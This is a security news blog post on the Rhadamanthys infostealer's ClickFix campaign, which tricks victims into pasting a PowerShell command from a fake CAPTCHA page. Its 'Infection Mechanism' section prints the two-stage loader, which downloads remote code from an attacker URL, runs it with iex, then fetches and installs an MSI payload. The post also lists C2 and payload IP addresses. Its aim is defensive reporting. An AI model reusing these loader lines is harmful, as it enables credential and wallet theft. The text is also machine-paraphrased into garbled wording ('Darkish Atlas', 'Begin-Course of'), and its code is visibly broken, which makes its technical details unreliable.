Skip to content
  • Blog Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form

Rhadamanthys Infostealer Leveraging ClickFix Technique to Steal Login Credentials

Posted on July 10, 2025July 10, 2025 By CWS

Rhadamanthys first surfaced in 2022 as a modular stealer bought below the Malware-as-a-Service mannequin, however its newest marketing campaign reveals how shortly it’s innovating.

On the centre of the brand new wave is a booby-trapped CAPTCHA web page dubbed ClickFix, which instructs victims to “confirm” their session by pasting a PowerShell command.

As soon as executed, the command silently reaches out to hxxps://ypp-studio[.]com/replace.txt, turns off execution-policy safeguards and fetches the next-stage payload in reminiscence—fully fileless till the ultimate drop.

Darkish Atlas analysts famous that the lure pages are hosted on freshly registered typosquats, typically imitating YouTube Companion Studio or comparable SaaS portals, and that the underlying infrastructure has migrated from the sooner 77.239.96.51/rh_0.9.0.exe host to 62.60.226.74/PTRFHDGS.msi.

This delicate shift breaks hard-coded IoCs utilized by many safety instruments whereas preserving the stealer’s supply chain.

Marketing campaign telemetry reveals a major uptick in infections throughout small-to-medium enterprises throughout June and early July 2025, with stolen browser cookies and cloud credentials showing on dark-web markets inside hours of compromise.

What makes ClickFix particularly potent is its social-engineering layer. The CAPTCHA display gives a pretend sense of legitimacy whereas exactly guiding the sufferer to press Win + R, paste the command, and hit Enter.

That single motion bypasses conventional e-mail gateway filters and avoids the macros most blue groups hunt for.

Verification full (Supply – Darkish Atlas)

By the point a person sees the reassuring “Verification full!” pop-up, Rhadamanthys has already unpacked within the background and begun siphoning knowledge to its C2 at 193.109.85.136.

An infection Mechanism

The preliminary PowerShell command is closely padded with hash symbols to evade string-based detectors, but resolves into solely two purposeful traces:-

# Stage 1 – clipboard payload
$u=’hxxps://ypp-studio[.]com/replace.txt’; (New-Object Web.WebClient).DownloadString($u) | iex
# Stage 2 – decoded from Stage 1
Invoke-WebRequest -Uri -OutFile $env:AppData+’PTRFHDGS.msi’;
Begin-Course of msiexec.exe -ArgumentList ‘/i’, $env:AppData+’PTRFHDGS.msi’;

Stage 1 lives solely in reminiscence; Stage 2 writes the MSI installer as PTRFHDGS.msi, which drops rh_0.9.0.exe and launches it with msiexec in order that guardian/youngster correlations seem benign.

The executable instantly enumerates working processes, trying to find debuggers resembling x64dbg.exe, ida64.exe, or ProcessHacker.exe; if discovered, it terminates itself to frustrate evaluation.

It follows with time-based anti-sandbox checks utilizing QueryPerformanceCounter, then injects into WerFault.exe—a trusted Home windows Error Reporting binary—to persist and exfiltrate.

A single TCP stream to the hard-coded IP carries compressed archives containing browser databases, crypto-wallet information and KeePass vaults.

Capturing screenshot (Supply – Darkish Atlas)

Screenshots captured by way of BitBlt are appended, giving operators a real-time window into sufferer exercise.

Since Rhadamanthys resolves its C2 by literal IP, DNS-layer defences see nothing, and encrypted TLS over port 443 blends seamlessly with regular site visitors.

The ClickFix marketing campaign underscores how effortlessly adversaries can fuse social engineering with low-friction LOLBins to bypass layered defences.

Updating signature-based guidelines to incorporate execution-policy bypasses, monitoring youngster processes of msiexec.exe, and alerting on clipboard-sourced PowerShell are speedy steps defenders ought to take into account.

But the broader lesson is behavioural: any “verification” immediate that asks customers to run code is suspect—particularly when the one factor it fixes is the attacker’s foothold.

Examine stay malware conduct, hint each step of an assault, and make quicker, smarter safety selections -> Attempt ANY.RUN now

Cyber Security News Tags:ClickFix, Credentials, InfoStealer, Leveraging, Login, Rhadamanthys, Steal, Technique

Post navigation

Previous Post: ServiceNow Flaw CVE-2025-3648 Could Lead to Data Exposure via Misconfigured ACLs
Next Post: AirMDR Raises $15.5 Million for MDR Solution

Related Posts

Anatsa Android Banking Malware from Google Play Targeting Users in the U.S. and Canada Cyber Security News
Microsoft Patch Tuesday July 2025: 130 Vulnerabilities Fixed Including 41 RCE Cyber Security News
Adversarial Machine Learning – Securing AI Models Cyber Security News
GLOBAL GROUP’s Golang Ransomware Attacks Windows, Linux, and macOS Environments Cyber Security News
Microsoft SQL Server 0-Day Vulnerability Exposes Sensitive Data Over Network Cyber Security News
New Phishing Attack Impersonates as DWP Attacking Users to Steal Credit Card Data Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • OpenAI’s Sam Altman Warns of AI Voice Fraud Crisis in Banking
  • New Coyote Malware Variant Exploits Windows UI Automation to Steal Banking Credentials
  • France Says Administrator of Cybercrime Forum XSS Arrested in Ukraine
  • Ransomware Gangs Leveraging RMM Tools to Attack Organizations and Exfiltrate Data
  • Clorox Sues IT Provider Cognizant For Simply Giving Employee Password to Hackers

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • OpenAI’s Sam Altman Warns of AI Voice Fraud Crisis in Banking
  • New Coyote Malware Variant Exploits Windows UI Automation to Steal Banking Credentials
  • France Says Administrator of Cybercrime Forum XSS Arrested in Ukraine
  • Ransomware Gangs Leveraging RMM Tools to Attack Organizations and Exfiltrate Data
  • Clorox Sues IT Provider Cognizant For Simply Giving Employee Password to Hackers

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News